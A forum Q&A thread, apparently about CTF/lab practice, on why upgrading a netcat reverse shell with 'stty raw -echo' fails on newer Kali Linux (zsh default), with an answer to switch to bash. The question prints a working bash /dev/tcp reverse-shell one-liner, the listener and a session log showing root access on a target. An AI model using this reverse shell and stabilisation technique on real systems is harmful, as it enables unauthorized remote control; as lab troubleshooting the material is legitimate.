Upgrading a reverse shell with stty raw -echo doesn't work



  • I successfully got a reverse shell:

    nc -lnvp 8000 # in Kali
    /bin/bash -i >& /dev/tcp/192.168.6.1/8000 0>&1 # in the victim machine
    

    I tried to upgrade it in the standard way:

    python -c 'import pty; pty.spawn("/bin/bash")'
    CTRL + Z
    stty raw -echo
    fg
    export TERM=xterm
    

    However, after running stty raw -echo and bringing the reverse shell back to the foreground with fg, the reverse shell doesn't work properly. When I press the ENTER button to attempt to run a command, it prints ^M. Since the ENTER button doesn't work, I can't run any commands and I can't use the shell.

    I know the commands are correct, because it used to work, but after upgrading to the latest Kali Linux, it doesn't work anymore.

    Full output of terminal session when trying to upgrade the shell:

    ┌──(user㉿kali)-[~/exercises/htb]
    └─$ nc -lnvp 8000
    listening on [any] 8000 ...
    connect to [10.0.2.15] from (UNKNOWN) [172.17.0.2] 46138
    root@9070f0e8043f:/# id 
    id
    uid=0(root) gid=0(root) groups=0(root)
    root@9070f0e8043f:/# python -c 'import pty; pty.spawn("/bin/bash")'
    python -c 'import pty; pty.spawn("/bin/bash")'
    root@9070f0e8043f:/# ^Z
    zsh: suspended  nc -lnvp 8000
    ┌──(user㉿kali)-[~/exercises/htb]
    └─$ stty raw -echo                                                         148 ⨯ 1 ⚙
    ┌──(user㉿kali)-[~/exercises/htb]
                                         └─$                                             fg                          
    [1]  + continued  nc -lnvp 8000
                                   export TERM=xterm^M^M
    


  • The reason why it doesn't work in Kali Linux is because the latest Kali uses the zsh shell by default, not bash. To get it to work, you just have to make sure you're using the bash shell.

    To temporarily switch to a bash shell, run the following command in your terminal:

    exec bash --login
    

    You can confirm if you're using bash by running:

    ps -p $$
    

    In the terminal which uses bash, run the listener and run the commands to upgrade the shell:

    python -c 'import pty; pty.spawn("/bin/bash")'
    CTRL + Z
    stty raw -echo
    fg
    export TERM=xterm
    

    As long as you're using bash and not zsh, it will work.


